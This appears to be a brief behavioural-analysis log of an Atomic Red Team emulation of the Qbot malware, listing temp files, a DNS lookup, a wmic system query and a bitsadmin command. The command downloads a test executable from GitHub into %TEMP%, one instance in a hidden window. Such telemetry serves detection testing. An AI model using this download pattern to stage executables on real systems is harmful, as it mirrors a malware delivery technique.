Technical Information
- '%TEMP%\atomic_qbot.exe'
- %TEMP%\bit6058.tmp
- %TEMP%\bit6058.tmp
- from %TEMP%\bit6058.tmp to %TEMP%\atomic_qbot.exe
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\bitsadmin.exe' /transfer qcxjb26 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe %TEMP%\Atomic_Qbot.exe' (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' OS get Caption /value
- '<SYSTEM32>\bitsadmin.exe' /transfer qcxjb26 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe %TEMP%\Atomic_Qbot.exe